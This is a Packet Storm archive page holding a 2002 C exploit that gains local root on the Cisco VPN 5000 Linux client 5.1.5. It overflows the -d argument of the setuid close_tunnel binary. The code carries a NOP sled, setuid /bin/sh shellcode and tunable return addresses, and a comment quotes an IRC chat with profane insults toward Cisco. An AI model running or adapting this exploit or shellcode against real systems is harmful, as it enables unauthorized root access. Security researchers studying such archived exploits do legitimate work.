what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ES-cisco-vpn.c

ES-cisco-vpn.c
Posted Sep 19, 2002
Authored by electronicsouls

Cisco VPN 5000 Linux client version 5.1.5 local root exploit that uses the close_tunnel binary.

tags | exploit, local, root
systems | cisco, linux
SHA-256 | ace076932d0664c2056944cff5c03f7c2d82699188fdeea7f90ecefb6ae7e279

ES-cisco-vpn.c

Change Mirror Download
/*
* [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
* (C) BrainStorm - 2002
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb) i r
* eax 0xffffffff -1
* ecx 0x0 0
* edx 0x0 0
* ebx 0x4015c154 1075167572
* esp 0xbfffdb70 0xbfffdb70
* ebp 0x41414141 0x41414141
* esi 0x400168e4 1073834212
* edi 0xbfffdbf4 -1073751052
* eip 0x41414141 0x41414141
* eflags 0x10286 66182
*
* as you can see %eip got filled with 0x41 ;)
*
* tested:
* - on release 5.1.5
* - from package: vpn-5000-linux-5.1.5-des-k8.tar.Z
* - system RedHat Linux 7.2 / x86
*
* Bug Information:
* There are multiple unchecked buffers in the code which allow
* arbitrary code to be executed with root privileges.
* this is due to insufficient bounds checking.
* the result is a classic command line buffer overflow condition.
* This should be exploitable on Linux/Solaris.
*
* IRC:
* <BrainStor> a standard cmd line buffer overflow in the -d option
* <BrainStor> close_tunnel is set +s by default
* <v0id> tsk tsk tsk, cisco making errors like that
* <v0id> fucking stupid cunts
* <BrainStor> yea
* <BrainStor> its ubeliveable
* <v0id> man, standard buffer overflow should be practiclly non existant
these days
* <v0id> oh well
* <BrainStor> indeed
* <BrainStor> but its good tho ;)
*/

#include <stdio.h>
#include <unistd.h>

#define B 2504
#define N 0x90
#define R 0xbfffefc0 //
may needs to be changed deppending on the distro/os..
#define BIN "/bin/close_tunnel" //
you maybe want to change this too =P
//
/usr/local/bin/close_tunnel or so..
char shell[] = "HELO" //
yes this is a valid x86 instruction ;)
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" //
setuid();
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";


int main(int argc, char **argv[])
{
int ret, off, es;

char bof[B];

printf("\n\n");
printf(" [ElectronicSouls] \n");
printf(" Cisco VPN 5000 client exploit \n");
printf(" (C) BrainStorm \n\n");

if(argv[1] == NULL) {
off = 0;
ret = R; }

else {
off = atoi(argv[1]);
ret = atoi(argv[2])+off; }

for (es = 0; es < B; es += 4 )
*(long *) &bof[es] = ret;

printf("+ return address: 0x%lx \n",ret);

for (es = 0; es < (B - strlen(shell) - 36); ++es)
*(bof+es) = N;

memcpy(bof+es, shell, strlen(shell));

printf("+ overflowing the buffer..\n\n\n");

execl(BIN,BIN,"-d",bof,0); // b00m!

return(0);
}


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close